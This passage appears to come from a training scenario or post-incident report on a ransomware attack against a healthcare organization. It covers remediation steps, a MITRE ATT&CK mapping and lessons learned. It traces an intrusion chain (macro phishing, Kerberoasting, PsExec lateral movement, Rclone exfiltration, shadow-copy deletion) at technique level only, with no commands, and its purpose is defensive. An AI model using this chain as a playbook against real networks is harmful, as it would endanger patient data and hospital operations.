  3. Implement network segmentation between clinical and administrative networks
  4. Deploy MFA on all privileged accounts and remote access
  5. Enable advanced email filtering with sandbox detonation for macro-enabled documents
  6. Notify HHS/OCR per HIPAA breach notification requirements (within 60 days)
  7. Offer credit monitoring to affected patients per regulatory requirements
  8. Conduct tabletop exercise with updated ransomware playbook

MITRE ATT&CK Mapping

| Tactic | Technique ID | Technique Name | Scenario Phase |
|---|---|---|---|
| Initial Access | T1566.001 | Phishing: Spearphishing Attachment | Malicious Word document delivery |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | PowerShell download cradle |
| Persistence | T1543.003 | Create or Modify System Process: Windows Service | Cobalt Strike service persistence |
| Privilege Escalation | T1078.002 | Valid Accounts: Domain Accounts | Cracked SVC-SQL credentials |
| Credential Access | T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting | Service ticket cracking |
| Discovery | T1087.002 | Account Discovery: Domain Account | BloodHound / AdFind enumeration |
| Lateral Movement | T1021.002 | Remote Services: SMB/Windows Admin Shares | PsExec to DC and file servers |
| Collection | T1039 | Data from Network Shared Drive | Patient records from file shares |
| Exfiltration | T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage | Rclone to attacker cloud storage |
| Impact | T1486 | Data Encrypted for Impact | CRIMSONLOCK ransomware deployment |
| Impact | T1490 | Inhibit System Recovery | Shadow copy deletion |

Lessons Learned

  1. Macro-enabled documents remain a primary initial access vector: The organization had no policy to block .docm attachments or enforce Protected View. Disabling macros by default and implementing sandbox detonation for email attachments would have prevented initial compromise.

  2. Kerberoasting targets weak service account passwords: The SVC-SQL account used a dictionary-based password that was cracked in 4 hours. Service accounts should use group Managed Service Accounts (gMSA), whose 120+ character passwords are generated and rotated automatically, eliminating Kerberoasting as a practical attack path.

  3. Nested AD group memberships create hidden privilege escalation paths: The Database Admins group nested inside Domain Admins was an overlooked misconfiguration. Regular AD hygiene audits with tools like BloodHound (used defensively) would have identified this attack path before adversaries did.

  4. Data exfiltration preceded encryption by 18+ hours: The double extortion model means that even with perfect backups, the organization still faces data exposure. DLP controls monitoring for bulk data transfers to unauthorized cloud destinations and blocking tools like rclone would have detected or prevented exfiltration.

  5. GPO-based ransomware deployment affects all domain-joined systems simultaneously: Monitoring GPO creation and modification events (Event ID 5136, 5137) and alerting on new startup scripts would have provided earlier detection of the deployment mechanism.

  6. Healthcare organizations face compounded regulatory impact: Beyond the ransom demand, HIPAA breach notification requirements, OCR investigations, and potential fines significantly amplify the total cost of a ransomware incident in healthcare. The estimated total cost including regulatory penalties, legal fees, and remediation exceeded $12M.


Cross-References